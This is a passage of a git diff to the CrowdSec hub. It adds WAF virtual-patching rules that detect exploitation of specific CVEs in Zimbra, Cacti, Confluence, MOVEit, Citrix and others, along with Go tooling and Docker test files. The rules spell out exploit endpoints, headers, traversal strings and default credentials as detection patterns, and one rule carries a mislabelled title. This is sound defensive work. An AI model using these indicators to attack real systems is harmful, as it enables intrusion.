+ label: "Laravel with Ignition <= v8.4.2 Debug Mode - Remote Code Execution (CVE-2021-3129)"
+ classification:
+ - cve.CVE-2021-3129
+ - attack.T1595
+ - attack.T1190
+ - cwe.CWE-98
\ No newline at end of file
diff --git a/appsec-rules/crowdsecurity/vpatch-CVE-2022-27926.yaml b/appsec-rules/crowdsecurity/vpatch-CVE-2022-27926.yaml
new file mode 100644
index 00000000000..25974ee90d4
--- /dev/null
+++ b/appsec-rules/crowdsecurity/vpatch-CVE-2022-27926.yaml
@@ -0,0 +1,31 @@
+name: crowdsecurity/vpatch-CVE-2022-27926
+description: "Detect CVE-2022-27926 exploits "
+rules:
+ - and:
+ - zones:
+ - URI
+ transform:
+ - lowercase
+ match:
+ type: endsWith
+ value: /public/error.jsp
+ - zones:
+ - ARGS
+ variables:
+ - errCode
+ transform:
+ - lowercase
+ match:
+ type: libinjectionXSS
+labels:
+ type: exploit
+ service: http
+ confidence: 3
+ spoofable: 0
+ behavior: "http:exploit"
+ label: "Zimbra Collaboration (ZCS) - Cross Site Scripting (CVE-2022-27926)"
+ classification:
+ - cve.CVE-2022-27926
+ - attack.T1595
+ - attack.T1190
+ - cwe.CWE-79
\ No newline at end of file
diff --git a/appsec-rules/crowdsecurity/vpatch-CVE-2022-35914.yaml b/appsec-rules/crowdsecurity/vpatch-CVE-2022-35914.yaml
new file mode 100644
index 00000000000..f5aad071f58
--- /dev/null
+++ b/appsec-rules/crowdsecurity/vpatch-CVE-2022-35914.yaml
@@ -0,0 +1,24 @@
+name: crowdsecurity/vpatch-CVE-2022-35914
+description: "Detect CVE-2022-35914 exploits "
+rules:
+ - and:
+ - zones:
+ - URI
+ transform:
+ - lowercase
+ match:
+ type: endsWith
+ value: /vendor/htmlawed/htmlawed/htmlawedtest.php
+
+labels:
+ type: exploit
+ service: http
+ confidence: 3
+ spoofable: 0
+ behavior: "http:exploit"
+ label: "GLPI <=10.0.2 - Remote Command Execution (CVE-2022-35914)"
+ classification:
+ - cve.CVE-2022-35914
+ - attack.T1595
+ - attack.T1190
+ - cwe.CWE-74
\ No newline at end of file
diff --git a/appsec-rules/crowdsecurity/vpatch-CVE-2022-44877.yaml b/appsec-rules/crowdsecurity/vpatch-CVE-2022-44877.yaml
new file mode 100644
index 00000000000..66b6ceeba64
--- /dev/null
+++ b/appsec-rules/crowdsecurity/vpatch-CVE-2022-44877.yaml
@@ -0,0 +1,30 @@
+name: crowdsecurity/vpatch-CVE-2022-44877
+description: "Detect CVE-2022-44877 exploits "
+rules:
+ - and:
+ - zones:
+ - URI
+ transform:
+ - lowercase
+ match:
+ type: endsWith
+ value: /login/index.php
+ - zones:
+ - ARGS
+ variables:
+ - login
+ match:
+ type: regex
+ value: "[^a-zA-Z0-9_.-]+"
+labels:
+ type: exploit
+ service: http
+ confidence: 3
+ spoofable: 0
+ behavior: "http:exploit"
+ label: "CentOS Web Panel 7 RCE (CVE-2022-44877)"
+ classification:
+ - cve.CVE-2022-44877
+ - attack.T1595
+ - attack.T1190
+ - cwe.CWE-78
\ No newline at end of file
diff --git a/appsec-rules/crowdsecurity/vpatch-CVE-2022-46169.yaml b/appsec-rules/crowdsecurity/vpatch-CVE-2022-46169.yaml
new file mode 100644
index 00000000000..c73dd16afde
--- /dev/null
+++ b/appsec-rules/crowdsecurity/vpatch-CVE-2022-46169.yaml
@@ -0,0 +1,34 @@
+name: crowdsecurity/vpatch-CVE-2022-46169
+description: "Detect CVE-2022-46169 exploits "
+rules:
+ - and:
+ - zones:
+ - URI
+ transform:
+ - lowercase
+ match:
+ type: endsWith
+ value: /remote_agent.php
+ - zones:
+ - ARGS
+ variables:
+ - poller_id
+ match:
+ type: regex
+ value: "[^a-zA-Z0-9_]"
+
+labels:
+ type: exploit
+ service: http
+ confidence: 3
+ spoofable: 0
+ behavior: "http:exploit"
+ label: "Cacti <=1.2.22 - Remote Command Injection (CVE-2022-46169)"
+ classification:
+ - cve.CVE-2022-46169
+ - attack.T1595
+ - attack.T1190
+ - cwe.CWE-74
+ - cwe.CWE-77
+ - cwe.CWE-78
+ - cwe.CWE-863
\ No newline at end of file
diff --git a/appsec-rules/crowdsecurity/vpatch-CVE-2023-20198.yaml b/appsec-rules/crowdsecurity/vpatch-CVE-2023-20198.yaml
new file mode 100644
index 00000000000..1c51bb3dc9b
--- /dev/null
+++ b/appsec-rules/crowdsecurity/vpatch-CVE-2023-20198.yaml
@@ -0,0 +1,28 @@
+name: crowdsecurity/vpatch-CVE-2023-20198
+description: "Detect CVE-2023-20198 exploits "
+rules:
+ - and:
+ - zones:
+ - URI
+ transform:
+ - lowercase
+ match:
+ type: endsWith
+ value: /%77ebui_wsma_https
+ - zones:
+ - METHOD
+ match:
+ type: equals
+ value: POST
+labels:
+ type: exploit
+ service: http
+ confidence: 3
+ spoofable: 0
+ behavior: "http:exploit"
+ label: "CISCO IOS XE account creation (CVE-2023-20198)"
+ classification:
+ - cve.CVE-2023-20198
+ - attack.T1595
+ - attack.T1190
+ - cwe.CWE-287
\ No newline at end of file
diff --git a/appsec-rules/crowdsecurity/vpatch-CVE-2023-22515.yaml b/appsec-rules/crowdsecurity/vpatch-CVE-2023-22515.yaml
new file mode 100644
index 00000000000..8a54159d587
--- /dev/null
+++ b/appsec-rules/crowdsecurity/vpatch-CVE-2023-22515.yaml
@@ -0,0 +1,37 @@
+name: crowdsecurity/vpatch-CVE-2023-22515
+description: "Detect CVE-2023-22515 exploits "
+rules:
+ - and:
+ - zones:
+ - URI
+ transform:
+ - lowercase
+ match:
+ type: endsWith
+ value: /setup/setupadministrator.action
+ - zones:
+ - METHOD
+ match:
+ type: equals
+ value: POST
+ - zones:
+ - HEADERS
+ variables:
+ - x-atlassian-token
+ transform:
+ - lowercase
+ match:
+ type: equals
+ value: "no-check"
+labels:
+ type: exploit
+ service: http
+ confidence: 3
+ spoofable: 0
+ behavior: "http:exploit"
+ label: "Atlassian Confluence Privesc (CVE-2023-22515)"
+ classification:
+ - cve.CVE-2023-22515
+ - attack.T1595
+ - attack.T1190
+ - cwe.CWE-284
\ No newline at end of file
diff --git a/appsec-rules/crowdsecurity/vpatch-CVE-2023-24489.yaml b/appsec-rules/crowdsecurity/vpatch-CVE-2023-24489.yaml
new file mode 100644
index 00000000000..5cbdf941526
--- /dev/null
+++ b/appsec-rules/crowdsecurity/vpatch-CVE-2023-24489.yaml
@@ -0,0 +1,41 @@
+name: crowdsecurity/vpatch-CVE-2023-24489
+description: "Detect CVE-2023-24489 exploits "
+rules:
+ - and:
+ - zones:
+ - URI
+ transform:
+ - lowercase
+ match:
+ type: endsWith
+ value: /documentum/upload.aspx
+ - zones:
+ - METHOD
+ match:
+ type: equals
+ value: POST
+ - zones:
+ - ARGS
+ variables:
+ - uploadid
+ match:
+ type: contains
+ value: ".."
+ - zones:
+ - RAW_BODY
+#it seems 'Page_Load' is the handler that can be abused, maybe some others can?
+ match:
+ type: contains
+ value: "Page_Load"
+labels:
+ type: exploit
+ service: http
+ confidence: 3
+ spoofable: 0
+ behavior: "http:exploit"
+ label: "Citrix ShareFile RCE (CVE-2023-24489)"
+ classification:
+ - cve.CVE-2023-24489
+ - attack.T1595
+ - attack.T1190
+ - cwe.CWE-284
\ No newline at end of file
diff --git a/appsec-rules/crowdsecurity/vpatch-CVE-2023-33617.yaml b/appsec-rules/crowdsecurity/vpatch-CVE-2023-33617.yaml
new file mode 100644
index 00000000000..0f35bc2d2e1
--- /dev/null
+++ b/appsec-rules/crowdsecurity/vpatch-CVE-2023-33617.yaml
@@ -0,0 +1,70 @@
+name: crowdsecurity/vpatch-CVE-2023-33617
+description: "Detect CVE-2023-33617 exploits "
+rules:
+ - and:
+ - zones:
+ - METHOD
+ transform:
+ - lowercase
+ match:
+ type: equals
+ value: post
+ - zones:
+ - URI
+ transform:
+ - lowercase
+ match:
+ type: endsWith
+ value: /boaform/admin/formlogin
+ - zones:
+ - BODY_ARGS
+ variables:
+ - username
+ transform:
+ - lowercase
+ match:
+ type: equals
+ value: "admin"
+ - zones:
+ - BODY_ARGS
+ variables:
+ - psd
+ transform:
+ - lowercase
+ match:
+ type: equals
+ value: "parks"
+ - and:
+ - zones:
+ - METHOD
+ match:
+ type: equals
+ value: POST
+ - zones:
+ - URI
+ transform:
+ - lowercase
+ match:
+ type: endsWith
+ value: /boaform/admin/formping
+ - zones:
+ - BODY_ARGS
+ variables:
+ - target_addr
+ transform:
+ - lowercase
+ match:
+ type: regex
+ value: "[^a-f0-9:.]+"
+labels:
+ type: exploit
+ service: http
+ confidence: 3
+ spoofable: 0
+ behavior: "http:exploit"
+ label: "Atlassian Confluence Privesc (CVE-2023-33617)"
+ classification:
+ - cve.CVE-2023-33617
+ - attack.T1595
+ - attack.T1190
+ - cwe.CWE-78
\ No newline at end of file
diff --git a/appsec-rules/crowdsecurity/vpatch-CVE-2023-34362.yaml b/appsec-rules/crowdsecurity/vpatch-CVE-2023-34362.yaml
new file mode 100644
index 00000000000..f1e84739d77
--- /dev/null
+++ b/appsec-rules/crowdsecurity/vpatch-CVE-2023-34362.yaml
@@ -0,0 +1,52 @@
+
+name: crowdsecurity/vpatch-CVE-2023-34362
+description: "Detect CVE-2023-34362 exploits "
+rules:
+ - and:
+ - zones:
+ - URI
+ transform:
+ - lowercase
+ match:
+ type: equals
+ value: /moveitisapi/moveitisapi.dll
+ - zones:
+ - ARGS
+ variables:
+ - action
+ match:
+ type: equals
+ value: m2
+ transform:
+ - lowercase
+ - zones:
+ - METHOD
+ match:
+ type: equals
+ value: POST
+ - zones:
+ - HEADERS_NAMES
+ transform:
+ - lowercase
+ match:
+ type: equals
+ value: 'x-silock-transaction'
+ - zones:
+ - HEADERS_NAMES
+ transform:
+ - lowercase
+ match:
+ type: regex
+ value: '.+x-silock-transaction'
+labels:
+ type: exploit
+ service: http
+ confidence: 3
+ spoofable: 0
+ behavior: "http:exploit"
+ label: "MOVEit Transfer - Remote Code Execution (CVE-2023-34362)"
+ classification:
+ - cve.CVE-2023-34362
+ - attack.T1595
+ - attack.T1190
+ - cwe.CWE-89
\ No newline at end of file
diff --git a/appsec-rules/crowdsecurity/vpatch-CVE-2023-3519.yaml b/appsec-rules/crowdsecurity/vpatch-CVE-2023-3519.yaml
new file mode 100644
index 00000000000..e03c6c407e0
--- /dev/null
+++ b/appsec-rules/crowdsecurity/vpatch-CVE-2023-3519.yaml
@@ -0,0 +1,37 @@
+name: crowdsecurity/vpatch-CVE-2023-3519
+description: "Detect CVE-2023-3519 exploits "
+rules:
+ - and:
+ - zones:
+ - METHOD
+ match:
+ type: equals
+ value: GET
+ - zones:
+ - URI
+ transform:
+ - lowercase
+ match:
+ type: endsWith
+ value: /gwtest/formssso
+ - zones:
+ - ARGS
+ variables:
+ - target
+ transform:
+ - length
+ match:
+ type: gte
+ value: 100
+labels:
+ type: exploit
+ service: http
+ confidence: 3
+ spoofable: 0
+ behavior: "http:exploit"
+ label: "Citrix RCE (CVE-2023-3519)"
+ classification:
+ - cve.CVE-2023-3519
+ - attack.T1595
+ - attack.T1190
+ - cwe.CWE-94
\ No newline at end of file
diff --git a/appsec-rules/crowdsecurity/vpatch-CVE-2023-38205.yaml b/appsec-rules/crowdsecurity/vpatch-CVE-2023-38205.yaml
new file mode 100644
index 00000000000..f8f59130322
--- /dev/null
+++ b/appsec-rules/crowdsecurity/vpatch-CVE-2023-38205.yaml
@@ -0,0 +1,23 @@
+name: crowdsecurity/vpatch-CVE-2023-38205
+description: "Detect CVE-2023-38205 exploits "
+rules:
+ - and:
+ - zones:
+ - URI
+ transform:
+ - lowercase
+ match:
+ type: contains
+ value: ..cfide/wizards/common/
+labels:
+ type: exploit
+ service: http
+ confidence: 3
+ spoofable: 0
+ behavior: "http:exploit"
+ label: "Adobe ColdFusion access control bypass (CVE-2023-38205)"
+ classification:
+ - cve.CVE-2023-38205
+ - attack.T1595
+ - attack.T1190
+ - cwe.CWE-284
\ No newline at end of file
diff --git a/appsec-rules/crowdsecurity/vpatch-CVE-2023-40044.yaml b/appsec-rules/crowdsecurity/vpatch-CVE-2023-40044.yaml
new file mode 100644
index 00000000000..93aab371a94
--- /dev/null
+++ b/appsec-rules/crowdsecurity/vpatch-CVE-2023-40044.yaml
@@ -0,0 +1,38 @@
+name: crowdsecurity/vpatch-CVE-2023-40044
+description: "Detect CVE-2023-40044 exploits "
+rules:
+ - and:
+ - zones:
+ - URI
+ transform:
+ - lowercase
+ match:
+ type: endsWith
+ value: /aht/
+ - zones:
+ - METHOD
+ match:
+ type: equals
+ value: POST
+ - zones:
+ - BODY_ARGS
+ transform:
+ - b64decode
+ - lowercase
+ match:
+ type: contains
+ value: "cmd"
+labels:
+ type: exploit
+ service: http
+ confidence: 3
+ spoofable: 0
+ behavior: "http:exploit"
+ label: "WS_FTP .NET deserialize RCE (CVE-2023-40044)"
+ classification:
+ - cve.CVE-2023-40044
+ - attack.T1595
+ - attack.T1190
+ - cwe.CWE-502
+
+
diff --git a/appsec-rules/crowdsecurity/vpatch-CVE-2023-42793.yaml b/appsec-rules/crowdsecurity/vpatch-CVE-2023-42793.yaml
new file mode 100644
index 00000000000..f7832be9a63
--- /dev/null
+++ b/appsec-rules/crowdsecurity/vpatch-CVE-2023-42793.yaml
@@ -0,0 +1,22 @@
+name: crowdsecurity/vpatch-CVE-2023-42793
+description: "Detect CVE-2023-42793"
+rules:
+ - zones:
+ - URI
+ transform:
+ - lowercase
+ match:
+ type: endsWith
+ value: /rpc2
+labels:
+ type: exploit
+ service: http
+ confidence: 3
+ spoofable: 0
+ behavior: "http:exploit"
+ label: "JetBrains Teamcity auth bypass (CVE-2023-42793)"
+ classification:
+ - cve.CVE-2023-42793
+ - attack.T1595
+ - attack.T1190
+ - cwe.CWE-288
diff --git a/appsec-rules/crowdsecurity/vpatch-CVE-2023-50164.yaml b/appsec-rules/crowdsecurity/vpatch-CVE-2023-50164.yaml
new file mode 100644
index 00000000000..a6dd6738869
--- /dev/null
+++ b/appsec-rules/crowdsecurity/vpatch-CVE-2023-50164.yaml
@@ -0,0 +1,38 @@
+name: crowdsecurity/vpatch-CVE-2023-50164
+description: "Detect CVE-2023-50164 exploits "
+rules:
+ - and:
+ - zones:
+ - URI
+ transform:
+ - lowercase
+ match:
+ type: endsWith
+ value: upload.action
+ - zones:
+ - METHOD
+ match:
+ type: equals
+ value: POST
+ - zones:
+ - BODY_ARGS
+ - ARGS
+ variables:
+ - uploadFileName
+ match:
+ type: contains
+ value: "../"
+labels:
+ type: exploit
+ service: http
+ confidence: 3
+ spoofable: 0
+ behavior: "http:exploit"
+ label: "Apache Struts2 (CVE-2023-50164)"
+ classification:
+ - cve.CVE-2023-50164
+ - attack.T1595
+ - attack.T1190
+ - cwe.CWE-552
+
+
diff --git a/appsec-rules/crowdsecurity/vpatch-env-access.yaml b/appsec-rules/crowdsecurity/vpatch-env-access.yaml
new file mode 100644
index 00000000000..736b949bd52
--- /dev/null
+++ b/appsec-rules/crowdsecurity/vpatch-env-access.yaml
@@ -0,0 +1,20 @@
+name: crowdsecurity/vpatch-env-access
+description: "Detect access to .env files"
+rules:
+ - zones:
+ - URI
+ transform:
+ - lowercase
+ match:
+ type: endsWith
+ value: /.env
+labels:
+ type: scan
+ service: http
+ confidence: 3
+ spoofable: 0
+ behavior: "http:scan"
+ label: "Access to .env file"
+ classification:
+ - attack.T1595
+ - attack.T1190
diff --git a/ci.go b/ci.go
index efa3ae748f8..8ac4d0c62b5 100644
--- a/ci.go
+++ b/ci.go
@@ -6,7 +6,6 @@ import (
"flag"
"fmt"
"io"
- "io/ioutil"
"log"
"os"
@@ -27,6 +26,8 @@ type typeInfo struct {
Parsers []string `json:"parsers,omitempty"`
PostOverflows []string `json:"postoverflows,omitempty"`
Scenarios []string `json:"scenarios,omitempty"`
+ AppsecRules []string `json:"appsec-rules,omitempty"`
+ AppsecConfigs []string `json:"appsec-configs,omitempty"`
Collections []string `json:"collections,omitempty"`
}
@@ -38,6 +39,8 @@ type fileInfo struct {
Parsers []string `yaml:"parsers,omitempty"`
PostOverflows []string `yaml:"postoverflows,omitempty"`
Scenarios []string `yaml:"scenarios,omitempty"`
+ AppsecRules []string `yaml:"appsec-rules,omitempty"`
+ AppsecConfigs []string `yaml:"appsec-configs,omitempty"`
Collections []string `yaml:"collections,omitempty"`
}
@@ -46,17 +49,12 @@ type versionInfo struct {
Deprecated bool `json:"deprecated"`
}
-const (
- parsersFolder = "parsers/"
- scenariosFolder = "scenarios/"
- postoverflowsFolder = "postoverflows/"
- collectionsFolder = "collections/"
-)
-
var types = []string{
"parsers",
"scenarios",
"postoverflows",
+ "appsec-rules",
+ "appsec-configs",
"collections",
}
@@ -93,7 +91,7 @@ func main() {
flag.Parse()
if target == "all" || target == "configs" {
- if generate == true {
+ if generate {
for _, t := range types {
configType, err := generateIndex(t)
if err != nil {
@@ -103,7 +101,7 @@ func main() {
}
} else {
// update .index file
- f, _ := ioutil.ReadFile(inputFile)
+ f, _ := os.ReadFile(inputFile)
_ = json.Unmarshal([]byte(f), &tmpIdx)
@@ -116,12 +114,12 @@ func main() {
if err != nil {
panic(err)
}
- if err := ioutil.WriteFile(outFile, json, 0644); err != nil {
+ if err := os.WriteFile(outFile, json, 0644); err != nil {
log.Fatalf("failed writting new json index : %s", err)
}
/*Check if the generated index is correct*/
- indexContent, err := ioutil.ReadFile(outFile)
+ indexContent, err := os.ReadFile(outFile)
if err != nil {
log.Fatalf("Unable to read index : %v", err)
}
@@ -151,6 +149,4 @@ func main() {
log.Fatalf("failed to dump new json file : %s", err)
}
}
- return
-
}
diff --git a/collections/crowdsecurity/appsec-crs.md b/collections/crowdsecurity/appsec-crs.md
new file mode 100644
index 00000000000..fa5c0a41b7c
--- /dev/null
+++ b/collections/crowdsecurity/appsec-crs.md
@@ -0,0 +1,2 @@
+# ModSecurity CRS
+
diff --git a/collections/crowdsecurity/appsec-crs.yaml b/collections/crowdsecurity/appsec-crs.yaml
new file mode 100644
index 00000000000..304ff6db0e1
--- /dev/null
+++ b/collections/crowdsecurity/appsec-crs.yaml
@@ -0,0 +1,13 @@
+parsers:
+ - crowdsecurity/appsec-logs
+appsec-configs:
+ - crowdsecurity/crs
+appsec-rules:
+ - crowdsecurity/crs
+description: "Appsec: Modsecurity core rule set rules"
+author: crowdsecurity
+tags:
+ - linux
+ - http
+ - appsec
+ - modsecurity
diff --git a/collections/crowdsecurity/appsec-virtual-patching.md b/collections/crowdsecurity/appsec-virtual-patching.md
new file mode 100644
index 00000000000..f7d38651500
--- /dev/null
+++ b/collections/crowdsecurity/appsec-virtual-patching.md
@@ -0,0 +1,3 @@
+# AppSec Virtual Patching
+
+This collection contains virtual patching for commonly exploited vulnerabilities, and is inspired from the [CISA Known Exploited Vulnerabilities Catalog](https://www.cisa.gov/known-exploited-vulnerabilities-catalog). The goal is to provide virtual patching capabilities for the often exploited vulnerabilities, avoiding false positives while catching pople scouting your applications for juicy vulnerabilities.
diff --git a/collections/crowdsecurity/appsec-virtual-patching.yaml b/collections/crowdsecurity/appsec-virtual-patching.yaml
new file mode 100644
index 00000000000..74a714f457b
--- /dev/null
+++ b/collections/crowdsecurity/appsec-virtual-patching.yaml
@@ -0,0 +1,32 @@
+name: crowdsecurity/appsec-virtual-patching
+appsec-rules:
+ - crowdsecurity/base-config
+ - crowdsecurity/vpatch-env-access
+ - crowdsecurity/vpatch-CVE-2023-40044
+ - crowdsecurity/vpatch-CVE-2017-9841
+ - crowdsecurity/vpatch-CVE-2020-11738
+ - crowdsecurity/vpatch-CVE-2022-27926
+ - crowdsecurity/vpatch-CVE-2022-35914
+ - crowdsecurity/vpatch-CVE-2022-46169
+ - crowdsecurity/vpatch-CVE-2023-20198
+ - crowdsecurity/vpatch-CVE-2023-22515
+ - crowdsecurity/vpatch-CVE-2023-33617
+ - crowdsecurity/vpatch-CVE-2023-34362
+ - crowdsecurity/vpatch-CVE-2023-3519
+ - crowdsecurity/vpatch-CVE-2023-42793
+ - crowdsecurity/vpatch-CVE-2023-50164
+ - crowdsecurity/vpatch-CVE-2023-38205
+ - crowdsecurity/vpatch-CVE-2023-24489
+ - crowdsecurity/vpatch-CVE-2021-3129
+ - crowdsecurity/vpatch-CVE-2021-22941
+ - crowdsecurity/vpatch-CVE-2019-12989
+ - crowdsecurity/vpatch-CVE-2022-44877
+appsec-configs:
+ - crowdsecurity/virtual-patching
+parsers:
+ - crowdsecurity/appsec-logs
+scenarios:
+ - crowdsecurity/appsec-vpatch
+description: "a generic virtual patching collection, suitable for most web servers."
+author: crowdsecurity
+
diff --git a/docker/appsec/Dockerfile b/docker/appsec/Dockerfile
new file mode 100644
index 00000000000..5ebd2c10f6e
--- /dev/null
+++ b/docker/appsec/Dockerfile
@@ -0,0 +1,28 @@
+FROM ubuntu:22.04
+
+# Install dependencies
+RUN apt-get update && apt-get install -y \
+ git \
+ make \
+ software-properties-common \
+ wget \
+ gnupg \
+ ca-certificates \
+ gettext
+
+RUN wget -O - https://openresty.org/package/pubkey.gpg | apt-key add -
+RUN echo "deb http://openresty.org/package/ubuntu $(lsb_release -sc) main"| tee /etc/apt/sources.list.d/openresty.list
+
+RUN apt-get update
+
+RUN apt-get install -y openresty
+
+# Install the bouncer
+COPY build.sh /build.sh
+COPY start.sh /start.sh
+
+RUN chmod +x /build.sh && /build.sh
+RUN chmod +x /start.sh
+
+# Set the script as the entrypoint
+ENTRYPOINT ["/start.sh"]
\ No newline at end of file
diff --git a/docker/appsec/build.sh b/docker/appsec/build.sh
new file mode 100644
index 00000000000..b6b61fa858a
--- /dev/null
+++ b/docker/appsec/build.sh
@@ -0,0 +1,20 @@
+#!/bin/bash
+set -e
+
+# clone the repo
+git clone https://github.com/crowdsecurity/cs-openresty-bouncer.git
+cd cs-openresty-bouncer
+
+# tmp until we merge
+git checkout waf_integration
+
+# make the release
+make release
+tar xzvf crowdsec-openresty-bouncer.tgz
+cd crowdsec-openresty-bouncer-v*
+
+# install the bouncer
+./install.sh -y
+
+
+
diff --git a/docker/appsec/docker-compose.yaml b/docker/appsec/docker-compose.yaml
new file mode 100644
index 00000000000..6bbf5da529b
--- /dev/null
+++ b/docker/appsec/docker-compose.yaml
@@ -0,0 +1,12 @@
+version: "3.8"
+services:
+ target:
+ build: .
+ environment:
+ - API_URL=http://127.0.0.1:8181
+ - API_KEY=this_is_a_bad_password
+ - APPSEC_URL=http://127.0.0.1:4241
+ volumes:
+ - ./nginx.conf:/usr/local/openresty/nginx/conf/nginx.conf
+ network_mode: "host"
+
diff --git a/docker/appsec/nginx.conf b/docker/appsec/nginx.conf
new file mode 100644
index 00000000000..52b555828d3
--- /dev/null
+++ b/docker/appsec/nginx.conf
@@ -0,0 +1,37 @@
+
+worker_processes 4;
+
+events {
+ worker_connections 1024;
+}
+
+http {
+ include mime.types;
+ default_type application/octet-stream;
+ sendfile on;
+ keepalive_timeout 65;
+
+ access_log /dev/stdout;
+ error_log /dev/stderr;
+
+ resolver 127.0.0.11;
+
+ include /usr/local/openresty/nginx/conf/conf.d/crowdsec_openresty.conf;
+
+ server {
+ listen 7822;
+ server_name localhost;
+
+ location / {
+ root html;
+ index index.html index.htm;
+ }
+
+ error_page 500 502 503 504 /50x.html;
+ location = /50x.html {
+ root html;
+ }
+ }
+
+
+}
\ No newline at end of file
diff --git a/docker/appsec/start.sh b/docker/appsec/start.sh
new file mode 100644
index 00000000000..365515620fb
--- /dev/null
+++ b/docker/appsec/start.sh
@@ -0,0 +1,12 @@
+#!/bin/bash
+set -x
+
+# set the API URL
+sed -i "s@API_KEY=.*@API_KEY=${API_KEY}@" /etc/crowdsec/bouncers/crowdsec-openresty-bouncer.conf
+sed -i "s@API_URL=.*@API_URL=${API_URL}@" /etc/crowdsec/bouncers/crowdsec-openresty-bouncer.conf
+echo "APPSEC_URL=${APPSEC_URL}" | tee -a /etc/crowdsec/bouncers/crowdsec-openresty-bouncer.conf
+
+cat /etc/crowdsec/bouncers/crowdsec-openresty-bouncer.conf
+
+# Start OpenResty
+exec openresty -g 'daemon off;'
\ No newline at end of file
diff --git a/generate.go b/generate.go
index 7f7c1878d57..76358e0e6e0 100644
--- a/generate.go
+++ b/generate.go
@@ -3,7 +3,6 @@ package main
import (
"encoding/base64"
"fmt"
- "io/ioutil"
"log"
"os"
"path"
@@ -14,14 +13,14 @@ import (
"gopkg.in/yaml.v2"
)
-func inSlice(s string, slice []string) bool {
- for _, str := range slice {
- if str == s {
- return true
- }
- }
- return false
-}
+const (
+ PARSER_TYPE = "parsers"
+ SCENARIO_TYPE = "scenarios"
+ POSTOVERFLOW_TYPE = "postoverflows"
+ APPSEC_RULES_TYPE = "appsec-rules"
+ APPSEC_CONFIGS_TYPE = "appsec-configs"
+ COLLECTIONS_TYPE = "collections"
+)
func (ti *typeInfo) generate(filepath string, configType string) (string, error) {
pathSplit := strings.Split(filepath, "/")
@@ -39,28 +38,25 @@ func (ti *typeInfo) generate(filepath string, configType string) (string, error)
// set user, stage and config name
var user string
var configName string
- if configType == "parsers" || configType == "postoverflows" {
+
+ switch configType {
+ case PARSER_TYPE, POSTOVERFLOW_TYPE:
if len(pathSplit) != 3 {
- return "", fmt.Errorf("invalid filepath '%s', should be : './%s///'", configType, filepath)
+ return "", fmt.Errorf("invalid filepath '%s', should be : './%s//'", configType, filepath)
}
ti.Stage = pathSplit[0]
user = pathSplit[1]
configName = pathSplit[2]
configName = strings.Split(configName, ".")[0]
- } else if configType == "scenarios" {
- if len(pathSplit) != 2 {
- return "", fmt.Errorf("invalid filepath '%s', should be : './scenarios//'", filepath)
- }
- user = pathSplit[0]
- configName = pathSplit[1]
- configName = strings.Split(configName, ".")[0]
- } else if configType == "collections" {
+ case SCENARIO_TYPE, APPSEC_RULES_TYPE, APPSEC_CONFIGS_TYPE, COLLECTIONS_TYPE:
if len(pathSplit) != 2 {
- return "", fmt.Errorf("invalid filepath '%s', should be : './collections//'", filepath)
+ return "", fmt.Errorf("invalid filepath '%s', should be : './%s//'", configType, filepath)
}
user = pathSplit[0]
configName = pathSplit[1]
configName = strings.Split(configName, ".")[0]
+ default:
+ return "", fmt.Errorf("invalid config type '%s'", configType)
}
// set the filepath
@@ -72,7 +68,7 @@ func (ti *typeInfo) generate(filepath string, configType string) (string, error)
/* Get description, author and references from the file */
var fInfo fileInfo
- yamlFile, err := ioutil.ReadFile(filepath)
+ yamlFile, err := os.ReadFile(filepath)
if err != nil {
return "", err
}
@@ -123,6 +119,16 @@ func (ti *typeInfo) generate(filepath string, configType string) (string, error)
} else {
ti.Collections = nil
}
+ if len(fInfo.AppsecRules) > 0 {
+ ti.AppsecRules = fInfo.AppsecRules
+ } else {
+ ti.AppsecRules = nil
+ }
+ if len(fInfo.AppsecConfigs) > 0 {
+ ti.AppsecConfigs = fInfo.AppsecConfigs
+ } else {
+ ti.AppsecConfigs = nil
+ }
}
// versions informations (digest and deprecated for each version)
@@ -162,7 +168,7 @@ func (ti *typeInfo) generate(filepath string, configType string) (string, error)
hubName := fmt.Sprintf("%s/%s", user, configName)
/*if we're all good, check if markdown documentation exists and join it*/
//pdocpath
- mdFile, err := ioutil.ReadFile(pdocpath)
+ mdFile, err := os.ReadFile(pdocpath)
if err == nil {
ti.LongDescription = base64.StdEncoding.EncodeToString([]byte(string(mdFile)))
}
@@ -193,7 +199,7 @@ func generateIndex(configType string) (map[string]typeInfo, error) {
var err error
hubName, err = info.generate(filepath, configType)
if err != nil {
- fmt.Printf("skipping '%s' because : %s\n", filepath, err.Error())
+ fmt.Printf("skipping '%s' for index generation because : %s\n", filepath, err.Error())
} else {
tInfo[hubName] = info
}
diff --git a/parsers/s01-parse/crowdsecurity/appsec-logs.yaml b/parsers/s01-parse/crowdsecurity/appsec-logs.yaml
new file mode 100644
index 00000000000..185d5bf54fe
--- /dev/null
+++ b/parsers/s01-parse/crowdsecurity/appsec-logs.yaml
@@ -0,0 +1,27 @@
+onsuccess: next_stage
+format: 3.0
+#debug: true
+filter: "evt.Parsed.program == 'appsec'"
+name: crowdsecurity/appsec-logs
+description: "Parse Appsec events"
+statics:
+ - meta: service
+ value: appsec
+ - meta: source_ip
+ expression: "evt.Parsed.source_ip"
+ - meta: target_host
+ expression: "evt.Parsed.target_host"
+ - meta: request_uuid
+ expression: "evt.Parsed.req_uuid"
+ - meta: target_uri
+ expression: "evt.Parsed.target_uri"
+#was the request blocked ?
+ - meta: log_type
+ expression: |
+ evt.Appsec.HasInBandMatches ? "appsec-block" : "appsec-info"
+ - meta: rule_name
+ expression: evt.Appsec.GetName()
+ - meta: rule_ids
+ expression: Sprintf("%+v", evt.Appsec.GetRuleIDs())
+ - meta: remediation_cmpt_ip
+ expression: "evt.Parsed.remediation_cmpt_ip"
diff --git a/parsers/s01-parse/crowdsecurity/caddy-logs.yaml b/parsers/s01-parse/crowdsecurity/caddy-logs.yaml
index 4f922c969fb..c311188198b 100644
--- a/parsers/s01-parse/crowdsecurity/caddy-logs.yaml
+++ b/parsers/s01-parse/crowdsecurity/caddy-logs.yaml
@@ -1,6 +1,5 @@
filter: "evt.Parsed.program startsWith 'caddy' && UnmarshalJSON(evt.Parsed.message, evt.Unmarshaled, 'caddy') in ['', nil]"
onsuccess: next_stage
-debug: true
name: crowdsecurity/caddy-logs
description: "Parse caddy logs"
statics:
diff --git a/parsers/s01-parse/crowdsecurity/palo-alto-threat-log.yaml b/parsers/s01-parse/crowdsecurity/palo-alto-threat-log.yaml
index 40561328905..8c271e116f2 100644
--- a/parsers/s01-parse/crowdsecurity/palo-alto-threat-log.yaml
+++ b/parsers/s01-parse/crowdsecurity/palo-alto-threat-log.yaml
@@ -1,5 +1,4 @@
onsuccess: next_stage
-debug: true
name: crowdsecurity/palo-alto-threat-log
